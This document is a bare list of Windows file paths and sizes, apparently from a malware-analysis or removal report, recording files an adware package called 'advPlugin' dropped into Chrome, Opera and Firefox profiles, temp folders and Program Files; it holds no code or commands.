C:\Users\"%CurrentUserName%"\Desktop\ÃËœÃ‘ÂÃÂºÃÂ°Ã‘â€šÃ‘Å’ ÃÂ² ÃËœÃÂ½Ã‘â€šÃÂµÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.url (174 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Preferences (484 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\shortcut.js (423 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\_metadata\verified_contents.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\weather.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\bookmarks\drag_drop.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\slider-arrow.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\exchange\exchange-3.png (884 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\traffic.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\04.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\wood_2.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-10.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\_flax.jpg (7 bytes)
%Program Files% (x86)\advPlugin\files\_locales\pt_PT\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\popup.js (364 bytes)
%Program Files% (x86)\advPlugin\files\_locales\th\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\et\messages.json (326 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl27CD.tmp\nsProcess.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\et\messages.json (326 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\gu\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\pl\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ko\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\skin\bindings.xml (1 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ml\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ms\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ta\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\he\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ko\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\install.rdf (16 bytes)
%Program Files% (x86)\advPlugin\files\_locales\bn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome.manifest (78 bytes)
%Program Files% (x86)\advPlugin\files\_locales\fi\messages.json (346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\files\popup.css (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\be\messages.json (437 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\hi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\gu\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hu\messages.json (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ml\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\nl\messages.json (362 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\skin\background.png (109 bytes)
%Program Files% (x86)\advPlugin\files\_locales\el\messages.json (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\id\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\skin\background.png (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ro\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\bg\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sl\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\skin\styles.css (257 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sq\messages.json (366 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sl\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl27CC.tmp (139128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ko\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\th\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\mk\messages.json (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt_PT\messages.json (349 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ta\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en_US\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ar\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\mr\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\en_US\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\Content.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\el\messages.json (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pl\messages.json (341 bytes)
C:\Windows\SysWOW64\GroupPolicy\gpt.ini (330 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\es_419\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\he\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\zh_CN\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\de\messages.json (338 bytes)
%Program Files% (x86)\advPlugin\BackgroundSingleton.tlb (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ar\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\vi\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ar\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\da\messages.json (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\uk\messages.json (476 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\tr\messages.json (355 bytes)
%Program Files% (x86)\advPlugin\files\_locales\nl\messages.json (362 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\de\messages.json (338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sk\messages.json (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\vi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\hu\messages.json (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sw\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\pt_PT\messages.json (349 bytes)
%Program Files% (x86)\advPlugin\files\files\popup.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\foreground.js (3312 bytes)
%Program Files% (x86)\advPlugin\files\_locales\am\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ml\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\lt\messages.json (369 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\popup.css (192 bytes)
%Program Files% (x86)\advPlugin\files\_locales\zh_CN\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\fi\messages.json (346 bytes)
%Program Files% (x86)\advPlugin\files\_locales\hu\messages.json (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\popup.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\zh_TW\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ms\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sq\messages.json (366 bytes)
%Program Files% (x86)\advPlugin\files\Kernel.js (784 bytes)
%Program Files% (x86)\advPlugin\Basement\ExtensionUpdaterService.exe (5203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\no\messages.json (328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\manifest.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fi\messages.json (346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\it\messages.json (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\Chromium.dll (6776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ml\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\en_GB\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\be\messages.json (437 bytes)
%Program Files% (x86)\advPlugin\Uninstaller.exe (5675 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pl\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\uk\messages.json (476 bytes)
%Program Files% (x86)\advPlugin\files\_locales\no\messages.json (328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\uk\messages.json (476 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\mk\messages.json (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sw\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\skin\arrow.png (332 bytes)
%Program Files% (x86)\advPlugin\files\popup.html (298 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\files\background.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en_GB\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sq\messages.json (366 bytes)
%Program Files% (x86)\advPlugin\files\_locales\cs\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\cs\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon16.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fa\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sq\messages.json (366 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ar\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\cs\messages.json (331 bytes)
%Program Files% (x86)\advPlugin\files\_locales\da\messages.json (345 bytes)
%Program Files% (x86)\advPlugin\install.html (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\bootstrap.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt_BR\messages.json (349 bytes)
%Program Files% (x86)\advPlugin\files\_locales\fil\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\foreground.js (3312 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sk\messages.json (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\lv\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\Kernel.js (784 bytes)
%Program Files% (x86)\advPlugin\files\files\foreground.js (3312 bytes)
%Program Files% (x86)\advPlugin\files\_locales\gu\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ca\messages.json (352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (39174 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\it\messages.json (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\background.xul (452 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\nl\messages.json (362 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\id\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\install.rdf (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sl\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en\messages.json (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fil\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\hu\messages.json (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ro\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en_US\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\popup.html (199 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\icons\icon64.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\te\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ta\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ca\messages.json (352 bytes)
%Program Files% (x86)\advPlugin\install.bat (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ca\messages.json (352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\popup.html (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\bg\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\fa\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\Content.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\icons\icon48.png (3 bytes)
%Program Files% (x86)\advPlugin\Interfaces64.dll (6584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en\messages.json (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\tr\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\bn\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\lv\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\en\messages.json (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\KompexSQLiteWrapper.dll (19644 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\bn\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\update.xml (473 bytes)
%Program Files% (x86)\advPlugin\files\_locales\uk\messages.json (476 bytes)
%Program Files% (x86)\advPlugin\uninstall.exe (58402 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\es_419\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl27CD.tmp\UserInfo.dll (14 bytes)
%Program Files% (x86)\advPlugin\files\_locales\he\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\lv\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\gu\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\es_419\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ta\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\files\foreground.js (601 bytes)
%Program Files% (x86)\advPlugin\files\_locales\bg\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\de\messages.json (338 bytes)
